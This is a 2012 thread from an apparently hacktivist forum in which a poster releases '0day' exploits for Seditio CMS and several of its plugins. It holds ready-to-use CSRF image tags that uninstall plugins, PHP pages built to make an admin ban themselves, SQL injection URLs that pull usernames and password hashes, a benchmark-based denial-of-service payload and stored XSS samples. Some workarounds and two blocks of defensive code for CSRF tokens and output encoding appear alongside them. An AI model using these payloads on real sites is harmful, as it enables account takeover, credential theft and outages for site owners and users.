Anti-armenia.ORG - Forums - Seditio Plugins Vulns



BlackMinD (Pr0grammer), 2012-04-12 07:31 GMT


Salam Aleykum)
Here we are 0daying a number of our exploits for Seditio plugins, as well as for Seditio CMS 165/170 and older versions.
Among these exploits are the ones for pmokuma, which everyone knows well (respect Metaizm) + T3 DB TOOLS + SF-QUICKBAN.
I'm sure you'll read and understand.
Let me say that in the Seditio build Kaan assembled there are in fact 2 vulnerable plugins.
The 1st is T3 DBTOOLS: whoever has it should delete it urgently; I've shown how, because the database can be wrecked via CSRF.
The 2nd is SFQUICKban, with which, first, the admin can be banned (the exploit is here) and on the other hand users too.

Let's go)
======================================================================
Vulnerable software: T3 DB Tools Version 1.6 (seditio database management plugin).
Developed by : http://www.t3-design.com/t3-db-tools/ (MD5 SUM: 8ab362601793e238f504783fd9953dd4 *dbtools.rar)
======================================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
======================================================================
About software:

T3 DB Tools
T3 DB Tools is a seditio database management plugin.

Features:
– Backup all or selected tables of your seditio DB.
– Table information and schema.
– Browse tables (experimental)
– Drop, truncate tables.
– Option to export data, structure or both.
– Support for gzip, bzip2 compression of the backups.
– Restore database backup.
– Run custom sed queries.
– Extra security rights.
– Check, analyze, repair and optimize tables.
– Auto create the backup folder and the directory blocker protection.
– 100% ability to translate.
– Easy navigation and event reports.
======================================================================
Vulnerability Desc:
T3 DB Tools Version 1.6 is prone to a CROSS SITE REQUEST FORGERY vulnerability.
It uses $_GET without any tokenization when dealing with DANGEROUS truncate, drop operations on your database.
See:
http://cxsecurity.com/issue/WLB-2012040071 (seditio165 CSRF and remote access to db dump)
======================================================================

======================Workaround=======================================
A) If you found it in your administration section, uninstall it immediately.
To do so:
Go to /system/core/admin/
1st: back up the dbinc/ directory (copy it to your PC).
Then delete it.
2nd: back up admin.dbtools.inc.php too (copy it to your PC).
Then delete the admin.dbtools.inc.php file too.
Or try to uninstall it from the Plugins section.
Secure the datas/backups directory by placing an .htaccess (deny from all) or remove the datas/backups/ directory.
(Do not forget to back it up too.)
B) Do not install T3 DB Tools. (Otherwise one nice day it'll drop/truncate your database tables)
======================================================================

Note: (Maybe previous versions are affected too, but not tested)

/AkaStep ^_^



===================================================================

Uninstalling plugins may cause data loss, functionality loss.
Tested with Seditio 165/seditio-build170.20120302 versions: [Uninstall Plugins] CSRF exploit.
Code:
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />

==============================================================================================

SF-QUICKban plugin CSRF vuln:
Can be used to ban others:
Tested under seditio 165 from seditio-eklenti.com
http://192.168.0.15/learn/128/sed/seditio165/users.php?m=quickban&uid=1&ip=192.168.0.1

The &uid parameter's value can be found from the user's/admin's profile.
The &ip parameter's value can be obtained from the user/admin directly (e.g. simply using an image sniffer).


So our "Universal" CSRF exploit to ban the admin
(Just send the link through a private message to the admin and say OLA to the admin.)


Code:
<?php
error_reporting('off');
/*
4 Fun
*/

$site='http://192.168.0.15/learn/128/sed/seditio165/';// define your target site here.

$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here

die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
    . '&a=confirmed" width="0" height="0" />'. PHP_EOL . '<h1>' . strrev($funmsg) . '</h1>');
?>


Or if the target site uses:
http://www.seditioforge.com/datas/users/1-sfquickban.rar

Our BAN ADMIN exploit.
Code:
<?php
error_reporting('off');
//tested under seditio 165
/*
4 Fun By AkaStep
*/

$site='http://192.168.0.15/learn/128/sed/seditio.170/';// define your target site here.

$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here

die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
    . '&a=confirmed" width="0" height="0" />'. PHP_EOL .
   
   '<img src="' . $site . '/plug.php?e=sfquickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
    . '&a=confirmed" width="0" height="0" />' .
    '<h1>' . strrev($funmsg) . '</h1>');

?>




Seditio 165/170
Info disclosure:
Try to post a very long string in the inputs (copy all the stuff from the page source and paste it into the inputs).


The application will expose column names.

E.g.:
Client-side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP

Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1



Persistent Cross-Site Scripting and HTML code injection vulnerabilities still unfixed + the same info/path disclosures still unfixed.
("Thanks" to the TinyMCE editor and thanks to client-side validation)
I notified about it here:
http://packetstormsecurity.org/files/111320/Seditio-Build-161-Cross-Site-Scripting-Information-Disclosure.html

Workaround: Do not use TinyMCE.
It is based on client-side validation.
Uninstall it from plugins and use Markitup or textboxer instead.

Workaround for the CSRF vulns:
Do not sit under an administrative/moderator account.
Do not browse any links/URLs while you are sitting under an administrative account.
Revoke ban grants from admins, moders.
Uninstall the SF-QUICK Ban plugin.
===========================================================================================

Code:
============================================================================
Vulnerable Software: PmOS - Pm Okuma Sistemi [plugin for Seditio CMS].
http://seditio-eklenti.com/datas/users/1-pmoku.rar (MD5 SUM: 88235c2b4b0613bff87545d2d887f042 *1-pmoku.rar)
http://seditio-eklenti.com/seditio-pm-okuma-eklentisi-d46.html
============================================================================
About Software:
PmOS - Pm Okuma Sistemi [plugin for Seditio CMS]
gives administrators the ability to read others' PMs (private messages)
============================================================================
Tested:
With: Seditio 165

*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
============================================================================
Vuln Desc:
Due to insufficient sanitization this plugin is prone to a Cross-Site Scripting vulnerability (persistent cross-site scripting vuln)
============================================================================

No sanitization when fetching data from the database.
And thanks to Seditio CMS again! It stores the private message body in the database without any sanitization:

===========================================================================
mysql> select * from sed_pm \G
*************************** 1. row ***************************
        pm_id: 6
     pm_state: 0
      pm_date: 1334009749
pm_fromuserid: 1
  pm_fromuser: admin
  pm_touserid: 1
     pm_title: <script>alert(1);</script>
      pm_text: <script>alert(2);</script>
1 row in set (0.00 sec)

mysql>
===========================================================================

Due to trust in this issue the pmoku plugin is vulnerable to XSS.
Vulnerable code section (from the bottom: $pm_text = $row['pm_text']; will be output unsanitized)
//plugins/pmoku/pmoku.admin.php
----------------------------------------Snip ------------------------------------
$sql = sed_sql_query("SELECT * FROM sed_pm ORDER by pm_date DESC LIMIT 0,50");

$plugin_body .= "<h4>".$L['editdeleteentries']." :</h4>";
$plugin_body .= "<table class=\"cells\"><tr>";
$plugin_body .= "<td class=\"coltop\">".$L['Delete']."</td>";
$plugin_body .= "<td class=\"coltop\">Tarih</td>";
$plugin_body .= "<td class=\"coltop\">Gönderen</td>";
$plugin_body .= "<td class=\"coltop\">Konu</td>";
$plugin_body .= "<td class=\"coltop\">Mesaj</td>";
$plugin_body .= "<td class=\"coltop\">Alan</td>";
$plugin_body .= "</tr>";

while ($row = sed_sql_fetcharray($sql))
{
$pm_id = $row['pm_id'];
$pm_date = @date($cfg['dateformat'], $row['pm_date'] + $usr['timezone'] * 3600);
$pm_fromuser = $row['pm_fromuser'];
$pm_title = $row['pm_title'];
$pm_text = $row['pm_text'];
$pm_touserid = $row['pm_touserid'];
$plugin_body .= "<form id=\"saveallowlist_".$allowlist_id."\" action=\"admin.php?m=tools&p=adminallow&amp;a=update&amp;id=".$allowlist_id."\" method=\"post\">";
$plugin_body .= "<tr><td style=\"text-align:center;\">[<a href=\"admin.php?m=tools&p=pmoku&amp;a=delete&amp;id=".$pm_id."&amp;".sed_xg()."\">x</a>]</td>";


$plugin_body .= "<td>$pm_date</td>";
$plugin_body .= "<td>$pm_fromuser</td>";
$plugin_body .= "<td>$pm_title</td>";
$plugin_body .= "<td>$pm_text</td>";
$plugin_body .= "<td>$pm_touserid</td>";
$plugin_body .= "<td><input type=\"submit\" class=\"submit\" value=\"".$L['Update']."\" /></td></tr></form>";
}
$plugin_body .= "</table>";
------------------------------EOF Snip ------------------------------------

Print screen:
http://s019.radikal.ru/i617/1204/b2/9c434fd50926.png


Special Thanks 2 MeTaiZm & 2 All AA Team.
+++++ Greetz to all ++++++
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!
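The three CSRF findings above (T3 DB Tools drop/truncate, plugin uninstall via admin.php?m=plug, SF-QuickBan) share one cause: a state-changing action is triggered by a plain GET that carries nothing tied to the admin's session. The following is an added example, not code from Seditio, T3 DB Tools or SF-QuickBan, of the token check that closes the hole. Seditio's own sed_xg() appends an x=TOKEN parameter for the same purpose, so this is that pattern written out stand-alone, with hypothetical names and a plain array standing in for the PHP session so it runs from the command line (PHP 7+ for random_bytes()):

```php
<?php
// Added example, not Seditio's, T3 DB Tools' or SF-QuickBan's code: the
// anti-CSRF token pattern the advisories above say is missing. Seditio's own
// sed_xg() appends an x=TOKEN parameter for the same purpose; the function and
// parameter names here are hypothetical and the token store is a plain array
// so the script runs from the CLI (needs PHP 7+ for random_bytes()).

// Issue the session token once; every later state-changing link carries it.
function csrf_token(array &$session)
{
    if (empty($session['xtoken'])) {
        $session['xtoken'] = bin2hex(random_bytes(16));
    }
    return $session['xtoken'];
}

// Build an admin link that carries the token, the way sed_xg() does with x=...
function admin_link(array &$session, array $params)
{
    $params['x'] = csrf_token($session);
    return 'admin.php?' . http_build_query($params);
}

// Verify a state-changing request: the session token must exist, the request
// must carry one, and they must match. hash_equals() keeps the comparison
// constant-time so the token cannot be guessed byte by byte.
function csrf_check(array $session, array $request)
{
    if (empty($session['xtoken']) || !isset($request['x'])) {
        return false;
    }
    return hash_equals($session['xtoken'], (string) $request['x']);
}

// Gate for the dangerous handlers (plugin uninstall, table drop/truncate,
// quickban): refuse and log instead of executing, and never echo the token.
function handle_plugin_action(array &$session, array $request)
{
    if (!csrf_check($session, $request)) {
        error_log('CSRF check failed for ' . json_encode($request));
        return 'Wrong parameter in the URL.';   // Seditio's generic refusal text
    }
    return 'plugin ' . $request['pl'] . ': ' . $request['b'] . ' executed';
}

// Constructed demo. The admin's own link is built from the session token;
// a link embedded on a third-party page cannot know that value, so the
// forged request below carries no x= at all.
$session = array();
$good = admin_link($session, array('m' => 'plug', 'a' => 'edit', 'pl' => 'dbtools', 'b' => 'uninstall'));
parse_str(substr($good, strlen('admin.php?')), $goodRequest);
$forgedRequest = array('m' => 'plug', 'a' => 'edit', 'pl' => 'dbtools', 'b' => 'uninstall');

echo $good, PHP_EOL;
echo handle_plugin_action($session, $goodRequest), PHP_EOL;
echo handle_plugin_action($session, $forgedRequest), PHP_EOL;
```

Run it with php from the shell: the first call goes through because the link was built from the session token, the second is refused and logged. Moving the dangerous handlers to POST is a worthwhile extra step, but the token is what actually stops a cross-site request, since an <img> tag can only issue a GET without the session value.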
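The pmoku loop above prints $pm_title and $pm_text from sed_pm straight into the table, and Seditio stores the message body raw, so the stored <script> runs in the admin's browser. Encoding at output is the fix (the plain htmlentities() BlackMinD recommends later in the thread). Here is an added example, not pmoku's or Seditio's code, of the same loop with encoding applied; the helper names are hypothetical and the row is constructed from the sed_pm dump above:

```php
<?php
// Added example, not pmoku's or Seditio's code: the admin listing loop from
// pmoku.admin.php with output encoding applied where database values meet
// HTML. Helper names are hypothetical; the sample row is constructed from
// the sed_pm dump in the advisory.

// Encode every character HTML treats specially. ENT_QUOTES also covers the
// attribute context, so the same helper is safe inside value="..." too.
function h($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

// Same columns as the original loop; every string that came out of the
// database passes through h(), integers are cast instead.
function render_pm_rows(array $rows, $dateformat = 'Y-m-d H:i')
{
    $body = '';
    foreach ($rows as $row) {
        $body .= '<tr>';
        $body .= '<td>' . h(gmdate($dateformat, (int) $row['pm_date'])) . '</td>';
        $body .= '<td>' . h($row['pm_fromuser']) . '</td>';
        $body .= '<td>' . h($row['pm_title']) . '</td>';
        $body .= '<td>' . h($row['pm_text']) . '</td>';
        $body .= '<td>' . (int) $row['pm_touserid'] . '</td>';
        $body .= '</tr>';
    }
    return $body;
}

// True when a raw tag from the stored payload survived; used as a self-check
// so the demo fails loudly if the escaping were removed.
function contains_raw_script($html)
{
    return stripos($html, '<script') !== false;
}

// Constructed row: the payload stored by the sed_pm dump above.
$rows = array(array(
    'pm_id'       => 6,
    'pm_date'     => 1334009749,
    'pm_fromuser' => 'admin',
    'pm_title'    => '<script>alert(1);</script>',
    'pm_text'     => '<script>alert(2);</script>',
    'pm_touserid' => 1,
));

$html = render_pm_rows($rows);
if (contains_raw_script($html)) {
    throw new RuntimeException('output encoding missing');
}
echo $html, PHP_EOL;
```

The point of encoding at output rather than at storage is that the database may already hold payloads (as the dump shows) and other code paths may read the same rows; the listing is safe regardless of what was stored, and the plugin's chmod does nothing for this since the browser, not the file system, is what runs the script.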


MetaizM (Gold), 2012-04-12 10:53 GMT


Special mic!
You've written the whole lot out, so people shouldn't use Seditio anymore
Respect!^_^


XEY (VIP), 2012-04-12 12:42 GMT


But I'm using a different one, sfquick ban.. and I don't know what the 1st one is

Step, you'll sort it out yourself


BlackMinD (Pr0grammer), 2012-04-12 14:38 GMT


And here's the SQL injection)
0day
Code:
============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from:neocrome.net
(MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is prone to an SQL injection vulnerability.
Note: *Successful exploitation requires administrative authentication to the system.*


//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');

if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&amp;f=".$f."&amp;v=".$v, "(".$v.")");
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");


Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--


Overload the MySQL server: (As a result the MySQL server goes down + high CPU load; in other words: create a denial of service through SQL injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF, especially if you have no access to the system as admin.
E.g.:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />

Print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png




Seditio 170 (seditio-build170.20120302) is also prone to a CSRF (Cross-Site Request Forgery)
vulnerability because it doesn't check request validity for $_GET requests,
and as a result we can silently uninstall/stop/pause/start plugins, which may cause:
data loss, functionality loss.
===========================================================================================
/*Tested with Seditio 165/seditio-build170.20120302   versions [Uninstall Plugins] CSRF exploit.*/
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
==============================================================================================



Information Disclosure:

Try to post a very long string in the inputs.

The application will expose column names, which is not acceptable anymore from a security standpoint.

E.g.:
Client-side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP



Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1



Persistent Cross-Site Scripting vulnerability still unfixed (from Seditio 161).
Same info/path disclosures still unfixed (from Seditio 161).
("Thanks" to the TinyMCE editor and thanks to client-side validation) (from Seditio 161)
I notified about it here + to the vendor too, but it is still unfixed in 170.20120302.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================


+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^
